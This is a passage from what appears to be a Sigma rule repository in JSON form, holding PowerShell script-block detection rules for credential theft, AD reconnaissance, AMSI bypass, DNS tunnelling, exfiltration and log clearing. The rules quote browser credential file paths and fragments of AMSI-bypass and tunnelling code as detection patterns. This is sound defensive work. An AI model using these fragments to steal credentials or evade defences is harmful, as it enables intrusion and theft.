    "content": "title: Access to Browser Login Data\nid: fc028194-969d-4122-8abe-0470d5b8f12f\nrelated:\n    - id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d\n      type: obsolete\n    - id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b\n      type: similar\nstatus: test\ndescription: |\n    Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\n    Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\n    Web browsers typically store the credentials in an encrypted format within a credential store.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md\nauthor: frack113\ndate: 2022-01-30\ntags:\n    - attack.credential-access\n    - attack.t1555.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - Copy-Item\n            - '-Destination'\n    selection_path:\n        ScriptBlockText|contains:\n            - '\\Opera Software\\Opera Stable\\Login Data'\n            - '\\Mozilla\\Firefox\\Profiles'\n            - '\\Microsoft\\Edge\\User Data\\Default'\n            - '\\Google\\Chrome\\User Data\\Default\\Login Data'\n            - '\\Google\\Chrome\\User Data\\Default\\Login Data For Account'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml",
    "content": "title: Potential Active Directory Enumeration Using AD Module - PsScript\nid: 9e620995-f2d8-4630-8430-4afd89f77604\nrelated:\n    - id: 70bc5215-526f-4477-963c-a47a5c9ebd12\n      type: similar\n    - id: 74176142-4684-4d8a-8b0a-713257e7df8e\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.\nreferences:\n    - https://github.com/samratashok/ADModule\n    - https://twitter.com/cyb3rops/status/1617108657166061568?s=20\n    - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges\nauthor: frack113, Nasreddine Bencherchali\ndate: 2023-01-22\ntags:\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.impact\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enable'\ndetection:\n    selection_generic:\n        ScriptBlockText|contains|all:\n            - 'Import-Module '\n            - 'Microsoft.ActiveDirectory.Management.dll'\n    selection_specific:\n        ScriptBlockText|contains: 'ipmo Microsoft.ActiveDirectory.Management.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml",
    "content": "title: Powershell Add Name Resolution Policy Table Rule\nid: 4368354e-1797-463c-bc39-a309effbe8d7\nstatus: test\ndescription: |\n  Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\n  This will bypass the default DNS server and uses a specified server for answering the query.\nreferences:\n    - https://twitter.com/NathanMcNulty/status/1569497348841287681\n    - https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps\nauthor: Borna Talebi\ndate: 2021-09-14\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1565\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Add-DnsClientNrptRule'\n            - '-Namesp'\n            - '-NameSe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml",
    "content": "title: Add Windows Capability Via PowerShell Script\nid: 155c7fd5-47b4-49b2-bbeb-eb4fab335429\nrelated:\n    - id: b36d01a3-ddaf-4804-be18-18a6247adfcd\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell\n    - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\nmodified: 2023-05-09\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains: 'Add-WindowsCapability '\n    selection_capa:\n        ScriptBlockText|contains: '-Name OpenSSH.' # For both \"OpenSSH.Server\" and \"OpenSSH.Client\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml",
    "content": "title: PowerShell ADRecon Execution\nid: bf72941a-cba0-41ea-b18c-9aca3925690d\nstatus: test\ndescription: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7\nreferences:\n    - https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1\n    - https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319\nauthor: Bhabesh Raj\ndate: 2021-07-16\nmodified: 2022-09-06\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Function Get-ADRExcelComOb'\n            - 'Get-ADRGPO'\n            - 'Get-ADRDomainController'\n            - 'ADRecon-Report.xlsx' # Default\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml",
    "content": "title: AMSI Bypass Pattern Assembly GetType\nid: e0d6c087-2d1c-47fd-8799-3904103c5a98\nstatus: test\ndescription: Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts\nreferences:\n    - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n    - https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.execution\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '[Ref].Assembly.GetType'\n            - 'SetValue($null,$true)'\n            - 'NonPublic,Static'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml",
    "content": "title: Potential AMSI Bypass Script Using NULL Bits\nid: fa2559c8-1197-471d-9cdd-05a0273d4522\nrelated:\n    - id: 92a974db-ab84-457f-9ec0-55db83d7a825\n      type: similar\nstatus: test\ndescription: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities\nreferences:\n    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-04\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - \"if(0){{{0}}}' -f $(0 -as [char]) +\"\n            - \"#<NULL>\"\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml",
    "content": "title: Silence.EDA Detection\nid: 3ceb2083-a27f-449a-be33-14ec1b7cc973\nstatus: test\ndescription: Detects Silence EmpireDNSAgent as described in the Group-IP report\nreferences:\n    - https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf\nauthor: Alina Stepchenkova, Group-IB, oscd.community\ndate: 2019-11-01\nmodified: 2023-04-03\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.t1572\n    - attack.impact\n    - attack.t1529\n    - attack.g0091\n    - attack.s0363\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    empire:\n        # better to randomise the order\n        ScriptBlockText|contains|all:\n            - 'System.Diagnostics.Process'\n            - 'Stop-Computer'\n            - 'Restart-Computer'\n            - 'Exception in execution'\n            - '$cmdargs'\n            - 'Close-Dnscat2Tunnel'\n    dnscat:\n        # better to randomise the order\n        ScriptBlockText|contains|all:\n            - 'set type=$LookupType`nserver'\n            - '$Command | nslookup 2>&1 | Out-String'\n            - 'New-RandomDNSField'\n            - '[Convert]::ToString($SYNOptions, 16)'\n            - '$Session.Dead = $True'\n            - '$Session[\"Driver\"] -eq'\n    condition: empire and dnscat\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml",
    "content": "title: Get-ADUser Enumeration Using UserAccountControl Flags\nid: 96c982fe-3d08-4df4-bed2-eb14e02f21c8\nstatus: test\ndescription: Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting\n    - https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/\nauthor: frack113\ndate: 2022-03-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        # 4194304 DONT_REQ_PREAUTH\n        ScriptBlockText|contains|all:\n            - 'Get-ADUser'\n            - '-Filter'\n            - 'useraccountcontrol'\n            - '-band'\n            - '4194304'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml",
    "content": "title: Potential Data Exfiltration Via Audio File\nid: e4f93c99-396f-47c8-bb0f-201b1fa69034\nstatus: test\ndescription: Detects potential exfiltration attempt via audio file using PowerShell\nreferences:\n    - https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.exfiltration\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_main:\n        ScriptBlockText|contains|all:\n            - '[System.Math]::'\n            - '[IO.FileMode]::'\n            - 'BinaryWriter'\n    selection_header_wav:\n        ScriptBlockText|contains|all:\n            # Byte chunks from the WAV header used in the example POC\n            # You can extend this for different audio formats by adding different selections\n            - '0x52'\n            - '0x49'\n            - '0x46'\n            - '0x57'\n            - '0x41'\n            - '0x56'\n            - '0x45'\n            - '0xAC'\n    condition: selection_main and 1 of selection_header_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml",
    "content": "title: Automated Collection Command PowerShell\nid: c1dda054-d638-4c16-afc8-53e007f3fbc5\nstatus: test\ndescription: Once established within a system or network, an adversary may use automated techniques for collecting internal data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\nauthor: frack113\ndate: 2021-07-28\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1119\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_ext:\n        ScriptBlockText|contains:\n            - '.doc'\n            - '.docx'\n            - '.xls'\n            - '.xlsx'\n            - '.ppt'\n            - '.pptx'\n            - '.rtf'\n            - '.pdf'\n            - '.txt'\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - 'Get-ChildItem'\n            - ' -Recurse '\n            - ' -Include '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml",
    "content": "title: Windows Screen Capture with CopyFromScreen\nid: d4a11f63-2390-411c-9adf-d791fd152830\nstatus: test\ndescription: |\n    Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\n    Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen\nauthor: frack113\ndate: 2021-12-28\nmodified: 2022-07-07\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: '.CopyFromScreen'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml",
    "content": "title: Clear PowerShell History - PowerShell\nid: 26b692dc-1722-49b2-b496-a8258aa6371d\nrelated:\n    - id: dfba4ce1-e0ea-495f-986e-97140f31af2d\n      type: derived\nstatus: test\ndescription: Detects keywords that could indicate clearing PowerShell history\nreferences:\n    - https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a\nauthor: Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2022-01-25\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection1a:\n        ScriptBlockText|contains:\n            - 'del'\n            - 'Remove-Item'\n            - 'rm'\n    selection1b:\n        ScriptBlockText|contains: '(Get-PSReadlineOption).HistorySavePath'\n    selection_2:\n        ScriptBlockText|contains|all:\n            - 'Set-PSReadlineOption'\n            - '–HistorySaveStyle'  # not sure if the homoglyph –/- is intended, just checking for both\n            - 'SaveNothing'\n    selection_3:\n        ScriptBlockText|contains|all:\n            - 'Set-PSReadlineOption'\n            - '-HistorySaveStyle'\n            - 'SaveNothing'\n    condition: 1 of selection_* or all of selection1*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml",
    "content": "title: Clearing Windows Console History\nid: bde47d4b-9987-405c-94c7-b080410e8ea7\nstatus: test\ndescription: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\nreferences:\n    - https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/\n    - https://www.shellhacks.com/clear-history-powershell/\n    - https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\nauthor: Austin Songer @austinsonger\ndate: 2021-11-25\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection1:\n        ScriptBlockText|contains: Clear-History\n    selection2a:\n        ScriptBlockText|contains:\n            - Remove-Item\n            - rm\n    selection2b:\n        ScriptBlockText|contains:\n            - ConsoleHost_history.txt\n            - (Get-PSReadlineOption).HistorySavePath\n    condition: selection1 or selection2a and selection2b\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml",
    "content": "title: Powershell Create Scheduled Task\nid: 363eccc0-279a-4ccf-a3ab-24c2e63b11fb\nstatus: test\ndescription: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task\nauthor: frack113\ndate: 2021-12-28\nmodified: 2025-10-07\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'New-ScheduledTaskAction'\n            - 'New-ScheduledTaskTrigger'\n            - 'New-ScheduledTaskPrincipal'\n            - 'New-ScheduledTaskSettingsSet'\n            - 'New-ScheduledTask'\n            - 'Register-ScheduledTask'\n    selection_cimmethod:\n        ScriptBlockText|contains|all:\n            - 'Invoke-CimMethod'\n            - '-ClassName'\n            - 'PS_ScheduledTask'\n            - '-NameSpace'\n            - 'Root\\Microsoft\\Windows\\TaskScheduler'\n    filter_main_legitimate_scripts:\n        ScriptBlockText|contains|all:\n            - 'Microsoft.PowerShell.Core\\Export-ModuleMember'\n            - 'Microsoft.Management.Infrastructure.CimInstance'\n            - '__cmdletization_methodParameter'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml",
    "content": "title: Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell\nid: db885529-903f-4c5d-9864-28fe199e6370\nrelated:\n    - id: 435e10e4-992a-4281-96f3-38b11106adde\n      type: similar\nstatus: test\ndescription: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\n    - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-ADComputer '\n            - ' -Filter \\*'\n        ScriptBlockText|contains:\n            - ' | Select '\n            - 'Out-File'\n            - 'Set-Content'\n            - 'Add-Content'\n    condition: selection\nfalsepositives:\n    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml",
    "content": "title: Powershell Install a DLL in System Directory\nid: 63bf8794-9917-45bc-88dd-e1b5abc0ecfd\nstatus: test\ndescription: Uses PowerShell to install/copy a file into a system directory such as \"System32\" or \"SysWOW64\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-27\nmodified: 2024-01-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1556.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|re: '(Copy-Item|cpi) .{2,128} -Destination .{1,32}\\\\Windows\\\\(System32|SysWOW64)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml",
    "content": "title: Registry-Free Process Scope COR_PROFILER\nid: 23590215-4702-4a70-8805-8dc9e58314a2\nstatus: test\ndescription: |\n    Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\n    The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\n    These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n    (Citation: Microsoft Profiling Mar 2017)\n    (Citation: Microsoft COR_PROFILER Feb 2013)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler\nauthor: frack113\ndate: 2021-12-30\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.012\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '$env:COR_ENABLE_PROFILING'\n            - '$env:COR_PROFILER'\n            - '$env:COR_PROFILER_PATH'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml",
    "content": "title: PowerShell Create Local User\nid: 243de76f-4725-4f2e-8225-a8a69b15ad61\nstatus: test\ndescription: Detects creation of a local user via PowerShell\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md\nauthor: '@ROxPinTeddy'\ndate: 2020-04-11\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'New-LocalUser'\n    condition: selection\nfalsepositives:\n    - Legitimate user creation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml",
    "content": "title: Create Volume Shadow Copy with Powershell\nid: afd12fed-b0ec-45c9-a13d-aa86625dac81\nstatus: test\ndescription: Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7\nauthor: frack113\ndate: 2022-01-12\ntags:\n    - attack.credential-access\n    - attack.t1003.003\n    - attack.ds0005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Win32_ShadowCopy\n            - ').Create('\n            - ClientAccessible\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml",
    "content": "title: Powershell Detect Virtualization Environment\nid: d93129cd-1ee0-479f-bc03-ca6f129882e3\nstatus: test\ndescription: |\n    Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\n    This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md\n    - https://techgenix.com/malicious-powershell-scripts-evade-detection/\nauthor: frack113, Duc.Le-GTSC\ndate: 2021-08-03\nmodified: 2022-03-03\ntags:\n    - attack.discovery\n    - attack.defense-evasion\n    - attack.t1497.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_action:\n        ScriptBlockText|contains:\n            - Get-WmiObject\n            - gwmi\n    selection_module:\n        ScriptBlockText|contains:\n            - MSAcpi_ThermalZoneTemperature\n            - Win32_ComputerSystem\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml",
    "content": "title: DirectorySearcher Powershell Exploitation\nid: 1f6399cf-2c80-4924-ace1-6fcff3393480\nstatus: test\ndescription: Enumerates Active Directory to determine computers that are joined to the domain\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher\nauthor: frack113\ndate: 2022-02-12\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-Object '\n            - 'System.DirectoryServices.DirectorySearcher'\n            - '.PropertiesToLoad.Add'\n            - '.findall()'\n            - 'Properties.name'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml",
    "content": "title: Manipulation of User Computer or Group Security Principals Across AD\nid: b29a93fb-087c-4b5b-a84d-ee3309e69d08\nstatus: test\ndescription: |\n    Adversaries may create a domain account to maintain access to victim systems.\n    Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell\n    - https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0\nauthor: frack113\ndate: 2021-12-28\ntags:\n    - attack.persistence\n    - attack.t1136.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: System.DirectoryServices.AccountManagement\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml",
    "content": "title: Disable Powershell Command History\nid: 602f5669-6927-4688-84db-0d4b7afb2150\nstatus: test\ndescription: Detects scripts or commands that disabled the Powershell command history by removing psreadline module\nreferences:\n    - https://twitter.com/DissectMalware/status/1062879286749773824\nauthor: Ali Alwashali\ndate: 2022-08-21\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Remove-Module\n            - psreadline\n    condition: selection\nfalsepositives:\n    - Legitimate script that disables the command history\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml",
    "content": "title: Disable-WindowsOptionalFeature Command PowerShell\nid: 99c4658d-2c5e-4d87-828d-7c066ca537c3\nstatus: test\ndescription: |\n    Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\n    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md\n    - https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-09-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - 'Disable-WindowsOptionalFeature'\n            - '-Online'\n            - '-FeatureName'\n    selection_feature:\n        # Add any important windows features\n        ScriptBlockText|contains:\n            - 'Windows-Defender-Gui'\n            - 'Windows-Defender-Features'\n            - 'Windows-Defender'\n            - 'Windows-Defender-ApplicationGuard'\n            # - 'Containers-DisposableClientVM' # Windows Sandbox\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml",
